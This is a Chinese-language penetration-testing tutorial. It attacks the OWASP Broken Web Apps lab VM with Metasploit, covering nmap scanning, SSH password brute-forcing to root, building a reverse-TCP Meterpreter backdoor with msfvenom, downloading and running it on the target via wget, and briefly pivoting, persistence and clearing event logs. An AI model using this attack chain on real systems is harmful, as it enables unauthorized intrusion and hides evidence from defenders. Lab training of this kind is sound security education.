一次简化的渗透实例

一、信息收集

1、启动数据库服务，并进入msf

root@promote:/home/z9m8r8# service postgresql start
root@promote:/home/z9m8r8# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@promote:/home/z9m8r8# msfconsole 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||
       =[ metasploit v6.0.52-dev                          ]
+ -- --=[ 2147 exploits - 1143 auxiliary - 365 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: Display the Framework log using the 
log command, learn more with help log
msf6 > db_status 
[*] Connected to msf. Connection type: postgresql.
msf6 > 

2、使用 NMAP 对目标主机进行探测扫描

（1）命令

msf6 > db_nmap -sV -p 21,22,23,25,80,443,445  10.10.10.129

（2）参数说明

• -sV：对目标主机的服务进行扫描
• -P：对目标的端口进行扫描

（3）扫描结果

• 使用services命令列出在目标端口上运行的服务

msf6 > services
Services
========
host          port  proto  name         state   info
----          ----  -----  ----         -----   ----
10.10.10.129  21    tcp    ftp          open    vsftpd 2.2.2
10.10.10.129  22    tcp    ssh          open    OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
10.10.10.129  23    tcp    telnet       closed
10.10.10.129  25    tcp    smtp         closed
10.10.10.129  80    tcp    http         open    Apache httpd 2.2.14 (Ubuntu) mod_mono /2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
10.10.10.129  443   tcp    https        closed
10.10.10.129  445   tcp    netbios-ssn  open    Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf6 > 

• 可以使用services –u命令对当前运行的服务进行过滤

msf6 > services -u
Services
========
host          port  proto  name         state  info
----          ----  -----  ----         -----  ----
10.10.10.129  21    tcp    ftp          open   vsftpd 2.2.2
10.10.10.129  22    tcp    ssh          open   OpenSSH 5.3p1 Debian 3ubuntu4 Ubuntu Linux; protocol 2.0
10.10.10.129  80    tcp    http         open   Apache httpd 2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
10.10.10.129  445   tcp    netbios-ssn  open   Samba smbd 3.X - 4.X workgroup: WORKGROUP
msf6 > 

• 可以使用hosts命令列出数据库中所有的主机

msf6 > hosts 
Hosts
=====
address    mac        name       os_name  os_flavor  os_sp  purpose  info  comments
-------    ---        ----       -------  ---------  -----  -------  ----  --------
10.10.10.129   00:0c:29:de:5d:ba    www.dvssc.com   Linux                      server
msf6 > 

（4）端口状态说明

• open：端口是开放的。
• closed：端口是关闭的。
• filtered：端口被防火墙IDS/IPS屏蔽，无法确定其状态。
• unfiltered：端口没有被屏蔽，但是否开放需要进一步确定。
• open|filtered：端口是开放的或被屏蔽。
• closed|filtered ：端口是关闭的或被屏蔽。

二、威胁建模+漏洞分析

•  通过各种渠道收集对应服务存在的漏洞，比如 ssh 服务，或许可被远程爆破登录，VSFTPD 2.3.4 存在命令执行漏洞等
• 此处以ssh服务为例，远程爆破 ssh 的登录账号及密码，获得 shell

三、渗透攻击

1、search 相应爆破登录模块

msf6 > search ssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution
1 auxiliary/scanner/ssh/apache_karaf_command_execution 2016-02-09 normal No Apache Karaf Default Credentials Command Execution
2 auxiliary/scanner/ssh/karaf_login normal No Apache Karaf Login Utility
…………
45 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
…………
msf6 > use auxiliary/scanner/ssh/ssh_login

2、配置相应参数

msf6 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential work s for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticateas
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 10.10.10.129
rhosts => 10.10.10.129
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file "/home/z9m8r8/test/user_pass.txt"
user_file => /home/z9m8r8/test/user_pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file "/home/z9m8r8/test/user_pass.txt"
pass_file => /home/z9m8r8/test/user_pass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set threads 10
threads => 10
msf6 auxiliary(scanner/ssh/ssh_login) >

3、攻击获得 shell 

msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 10.10.10.129:22 - Starting bruteforce
[+] 10.10.10.129:22 - Success: 'root:owaspbwa' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 2 opened (10.10.10.128:34583 -> 10.10.10.129:22) at 2021-09-15 16:19:51 +0800
[+] 10.10.10.129:22 - Success: 'user:owaspbwa' 'uid=1000(user) gid=1000(user) groups=4(adm),20(dialout),24(cdrom),46(plugdev),111(sambashare),116(lpadmin),117(admin),1000(user) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Command shell session 3 opened (10.10.10.128:34885 -> 10.10.10.129:22) at 2021-09-15 16:21:39 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 shell linux SSH root:owaspbwa (10.10.10. 10.10.10.128:34583 -> 10.10.1
129:22) 0.129:22 (10.10.10.129)
3 shell linux SSH user:owaspbwa (10.10.10. 10.10.10.128:34885 -> 10.10.1
129:22) 0.129:22 (10.10.10.129)

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 2
[*] Starting interaction with 2...
stdin: is not a tty
Welcome to the OWASP Broken Web Apps VM
!!! This VM has many serious security issues. We strongly recommend that you run
it only on the "host only" or "NAT" network in the VM settings !!!
You can access the web apps at http://10.10.10.129/
You can administer / configure this machine through the console here, by SSHing
to 10.10.10.129, via Samba at \\10.10.10.129\, or via phpmyadmin at
http://10.10.10.129/phpmyadmin.
In all these cases, you can use username "root" and password "owaspbwa".
whoami
root
pwd
/root

• 由上图知仅获得了目标的一个 shell 控制，为此进行以下操作提权

4、获取Meterpreter 命令行

（1）创建 Meterpreter 攻击载荷

• 命令

root@promote:/var/www/html# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f elf >backdoor.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
root@promote:/var/www/html#

• 参数说明

　　参数-p指定需要使用的攻击载荷， LHOST指定我们自己计算机的IP地址， LPORT指定我们自己的端口。backdoor.elf文件将会在目标计算机上连接刚才我们设定的IP地址和端口，并提供一个目标计算机上的Meterpreter权限。参数-f定义了输出类型， elf是一种基于Linux类型系统的默认扩展名。

• 启动攻击机 Apache服务

root@promote:/var/www/html# service apache2 start

• 注意，需要将 backdoor.elf 放置在 /var/www/html/ 目录下

（2）让目标系统从我们的计算机中下载这个木马文件

wget http://10.10.10.128/backdoor.elf
--2021-09-15 04:41:53-- http://10.10.10.128/backdoor.elf
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: `backdoor.elf'
0K 100% 44.1M=0s
2021-09-15 04:41:53 (44.1 MB/s) - `backdoor.elf' saved [207/207]

（3）攻击机启动监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specifi
ed)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 10.10.10.128
lhost => 10.10.10.128
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.10.128:4444

（4）在目标系统上对木马赋予执行权限，并执行

chmod 777 backdoor.elf
./backdoor.elf

5、结果

四、后渗透攻击

1、内网渗透

　　 简述：在已控制的主机上收集路由信息，并在已经成功渗透的主机上使用autoroute命令来设置跳板，对其内网进行如上类似操作。

2、渗透访问控制的持久化

 　　运行persistence模块即可

3、清楚渗透痕迹

　　可在Meterpreter命令行中输入clearv命令清除目标系统的事件日志。

五、参考文献：

　　《精通Metasploit渗透测试》